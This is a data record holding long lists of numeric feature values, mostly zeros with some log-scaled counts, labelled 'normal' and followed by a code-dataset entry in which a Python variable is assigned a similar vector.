0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
normal
{ "blob_id": "dc6cbf43424a31f1aefde8bd71b6f1b7ecf8166b", "index": 5998, "step-1": "<mask token>\n", "step-2": "vect = [0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 5.723585101952381, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 3.178053830347946, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, 0.0, \n 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 8.320673301762177,\n 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 2.772588722239781, 0, 0, 0.0, 1.791759469228055,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.287897844304593, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.772588722239781, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 4.394449154672439, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 1.3862943611198906, \n 2.772588722239781, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.6375861597263857, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0,\n 0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624,\n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 1.3862943611198906, 0.0, 0, 0.0, \n 1.7412592803704001, 2.9957322735539913, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.198469360840316, 0.0, \n 2.550898738446989, 0, 0, 0.0, 0, 0.0, 3.4011973816621555, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, \n 3.5263605246161616, 0.0, 0.0, 3.58351893845611, 0, 0, 0.0, 0.0, 0.0, \n 3.6375861597263857, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, \n 3.2188758248682006, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.6888794541139363, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, \n 0.0, 2.0794415416798357, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.649511027115099, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.6109179126442243, 5.723585101952381, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.6375861597263857, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.295836866004329, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 5.5834963087817, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.9459101490553132, 0.0, 0, 0, 0.0, 0.0, 2.9957322735539913, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 3.6888794541139363, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 